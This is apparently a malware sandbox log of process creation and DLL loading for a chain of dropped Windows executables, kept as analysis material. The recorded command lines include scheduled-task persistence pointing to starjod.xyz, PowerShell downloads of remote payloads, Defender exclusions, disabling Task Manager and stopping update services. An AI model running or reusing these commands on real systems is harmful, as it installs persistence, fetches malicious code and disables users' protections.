Source: C:\Users\user\AppData\Local\Temp\1000064001\NewLatest.exe	Process created: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe "C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe"
Source: C:\Users\user\AppData\Local\Temp\b66a8ae076\Hkbsse.exe	Process created: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe "C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe"
Source: C:\Users\user\AppData\Local\Temp\1000091001\Installer.exe	Process created: C:\Windows\System32\cmd.exe cmd /c ins.bat
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://bit.ly/4c7L8Zs' -UseBasicParsing >$null"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Start-Process 'C:\Users\user\AppData\Local\Temp\install.bat' -Verb runAs -WindowStyle Hidden"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -Command "Invoke-WebRequest -Uri 'https://github.com/frielandrews892/File/releases/download/File/File.zip' -OutFile 'C:\Users\user\AppData\Local\Corporation.zip'"
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=1976,i,13008057161343220157,61792312660998642,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2104 --field-trial-handle=1844,i,8972611737897508834,4615011947215389574,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\AppData\Local\Temp\1000092001\legs.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3136 -ip 3136
Source: C:\Windows\System32\svchost.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3136 -s 264
Source: C:\Windows\SysWOW64\WerFault.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop WaaSMedicSvc
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop bits
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop dosvc
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\sc.exe C:\Windows\system32\sc.exe stop wuauserv
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\install.bat"
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1000015001\FirstZ.exe	Process created: unknown unknown
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\install.bat"
Source: C:\Users\user\AppData\Local\Temp\1000094001\taskweaker.exe	Process created: unknown unknown
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "Cleaner" /tr "C:\Users\user\AppData\Local\Corporation\File\RemoteExecuteScriptSilent.exe" /sc onstart /delay 0005:00
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /f /v DisableTaskMgr /t REG_DWORD /d 00000001
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 10 /TN "CCleaner" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /SC MINUTE /MO 11 /TN "Updater" /TR "\"C:\Program Files\Google\Chrome\Application\chrome.exe\" http://starjod.xyz/Website.php" /F
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestart

Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\hsRju5CPK2.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8254624243\axplong.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: rstrtmgr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: windows.shell.servicehostbuilder.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: policymanager.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000007001\ama.exe	Section loaded: msvcp110_win.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1000035001\gold.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: aclayers.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: sfc_os.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: msvcp140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe	Section loaded: wintypes.dll	Jump to behavior
